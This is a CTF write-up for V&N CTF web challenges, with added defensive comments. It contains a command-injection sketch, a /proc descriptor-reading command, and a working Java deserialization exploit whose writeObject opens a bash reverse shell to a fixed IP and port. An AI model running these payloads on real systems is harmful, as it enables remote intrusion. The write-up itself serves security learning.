Created
March 1, 2020 11:36
v&n ctf web部分wp
# web 1 | |
一个简单的漏洞利用题,知道 CTFd 的账号接管漏洞就能做。
# web 2 | |
伪代码如下 | |
``` | |
# Pseudocode of the challenge service, as sketched by the write-up author.
# The value returned by open() is not closed anywhere in this sketch.
# NOTE(review): presumably the real service keeps the handle referenced, so the
# descriptor stays open for the life of the process - confirm against the challenge source.
open("flag.txt","r") | |
# Presumably a web request handler, since it reads request.form; routing is not shown.
def shell(): | |
# Removes the path flag.txt; the sketch does not close the handle opened above first.
os.system("rm flag.txt") | |
# Passes the form field "c" to the shell unmodified: command injection by design here.
# Outside a CTF, request data must never reach os.system, and sensitive files should be
# closed before any child process is spawned.
os.system(request.form["c"]) | |
``` | |
这是一道查文档 / 考验基础的题,我是查文档得到的提示。
Python 在 open 之后,进程会一直持有该文件的文件描述符(fd),直到它被关闭;
rm 只是删除了目录项,只要还有进程持有打开的 fd,文件内容就不会被释放。
而 Linux 会把每个进程打开的 fd 以特殊文件的形式暴露在 /proc/<pid>/fd/ 下,
所以
``` | |
# Reads every descriptor entry of every process that is visible under /proc.
# Defensive note: a file that was unlinked while a process still holds it open stays
# readable this way; close the handle before deleting, and limit what the command-running
# account can see under /proc (for example with the procfs hidepid mount option).
cat /proc/*/fd/* | |
``` | |
### web3 | |
一个超级简单的 java反序列化的题。 | |
如果类比成 PHP,大概是这样 | |
``` | |
// PHP analogy given by the author for the Java class shown later in the write-up.
// __destruct() runs when the object is destroyed and hands $this->data to system().
// NOTE(review): the danger arises when such an object is created by unserialize() on
// attacker-controlled input, because the attacker then chooses $this->data; the
// unserialize() call itself is not shown in this snippet.
class Tools{ | |
    // Destructor: executes the string stored in the data property as a shell command.
    public function __destruct() | |
    { | |
        system($this->data); | |
    } | |
} | |
``` | |
我的exp | |
``` | |
package com.tools; | |
import java.io.ByteArrayInputStream; | |
import java.io.ByteArrayOutputStream; | |
import java.io.IOException; | |
import java.io.ObjectInputStream; | |
import java.io.ObjectOutputStream; | |
import java.io.Serializable; | |
/**
 * Proof-of-concept class from a CTF write-up on Java deserialization.
 *
 * <p>Its custom {@code writeObject} emits a fixed command array, and its custom
 * {@code readObject} hands whatever object it reads to {@link ProcessBuilder} and starts
 * it. Deserializing an instance of this class therefore launches an OS process.
 *
 * <p>NOTE(review): presumably this mirrors a class of the same name and
 * {@code serialVersionUID} on the challenge server; the server code is not shown here.
 *
 * <p>Defensive takeaway: do not call {@link ObjectInputStream#readObject()} on untrusted
 * bytes without an {@code ObjectInputFilter} allow-list, and never start processes or
 * perform other side effects inside a {@code readObject} hook.
 */
public class Tools implements Serializable { | |
    // Fixed stream version id. A receiving JVM rejects the stream unless its own Tools
    // class declares the same value.
    private static final long serialVersionUID = 1L; | |
    // Never read or assigned in this listing; writeObject below does not write its value.
    private String testCall; | |

    /**
     * Deserializes a single object from {@code bytes}.
     *
     * <p>No {@code ObjectInputFilter} is configured, so the stream decides which
     * Serializable class is instantiated and which {@code readObject} hooks run.
     * This is unsafe for input that crosses a trust boundary. The stream is not closed;
     * it only wraps an in-memory array.
     *
     * @param bytes serialized form of one object
     * @return the object read from the stream
     * @throws Exception if the stream is malformed or a class cannot be resolved
     */
    public static Object parse(byte[] bytes) throws Exception { | |
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes)); | |
        return ois.readObject(); | |
    } | |

    /**
     * Serializes {@code obj} into a byte array.
     *
     * <p>The ObjectOutputStream is neither flushed nor closed explicitly before the
     * buffer is copied out.
     *
     * @param obj object to serialize
     * @return the bytes written to the in-memory buffer
     * @throws Exception if {@code obj} cannot be serialized
     */
    public static byte[] create(Object obj) throws Exception { | |
        ByteArrayOutputStream bos = new ByteArrayOutputStream(); | |
        ObjectOutputStream outputStream = new ObjectOutputStream(bos); | |
        outputStream.writeObject(obj); | |
        return bos.toByteArray(); | |
    } | |

    /**
     * Serialization hook that ObjectInputStream invokes while reading an instance.
     *
     * <p>Reads one object, casts it to {@code String[]} without a type check (any other
     * type raises ClassCastException) and starts it as an OS process. This is the
     * dangerous sink: the contents of the stream choose the program that runs.
     */
    private void readObject(ObjectInputStream s) throws IOException, ClassNotFoundException { | |
        Object obj = s.readObject(); | |
        (new ProcessBuilder((String[])obj)).start(); | |
    } | |

    /**
     * Serialization hook that ObjectOutputStream invokes while writing an instance.
     *
     * <p>Ignores the instance state and writes a hard-coded three-element command array:
     * a shell, {@code -c}, and a line that redirects an interactive shell to a fixed
     * host and port (a reverse shell). For defenders, the observable effects are a shell
     * spawned as a child of the JVM and an outbound TCP connection from the
     * application host.
     */
    private void writeObject(java.io.ObjectOutputStream s) throws IOException { | |
        String [] cmd = new String[]{"/bin/bash","-c"," bash -i >& /dev/tcp/174.0.220.200/8888 0>&1 "}; | |
        s.writeObject(cmd); | |
    } | |
} | |
``` | |
``` | |
package com; | |
import com.tools.Tools; | |
import com.tools.ClientInfo; | |
import java.io.*; | |
import java.util.*; | |
import com.tools.Person; | |
/**
 * Driver for the write-up: serializes one {@code com.tools.Tools} instance and prints the
 * bytes as Base64 on standard output.
 *
 * <p>NOTE(review): presumably the printed string is what gets submitted to the challenge
 * endpoint; that step is not shown here.
 *
 * <p>Detection note: a Java serialization stream starts with the bytes AC ED 00 05, so
 * its Base64 form starts with {@code rO0AB}. Request parameters, cookies or bodies with
 * that prefix are worth alerting on and should never be passed to
 * {@code ObjectInputStream} unfiltered.
 */
public class m { | |
    /**
     * Builds the object, serializes it in memory and prints the Base64 text.
     *
     * @param args unused
     * @throws Exception if serialization fails
     */
    public static void main(String[] args) throws Exception { | |
        com.tools.Tools t = new com.tools.Tools(); | |
        ObjectOutputStream oos = null; | |
        ByteArrayOutputStream baos = null; | |
        // Serialize: writing t invokes the custom writeObject hook of Tools.
        baos = new ByteArrayOutputStream(); | |
        oos = new ObjectOutputStream(baos); | |
        oos.writeObject(t); | |
        // oos is not flushed or closed before the buffer is copied out.
        byte[] bytes = baos.toByteArray(); | |
        Base64.Encoder encoder = Base64.getEncoder(); | |
        System.out.println(encoder.encodeToString(bytes)); | |
    } | |
} | |
``` |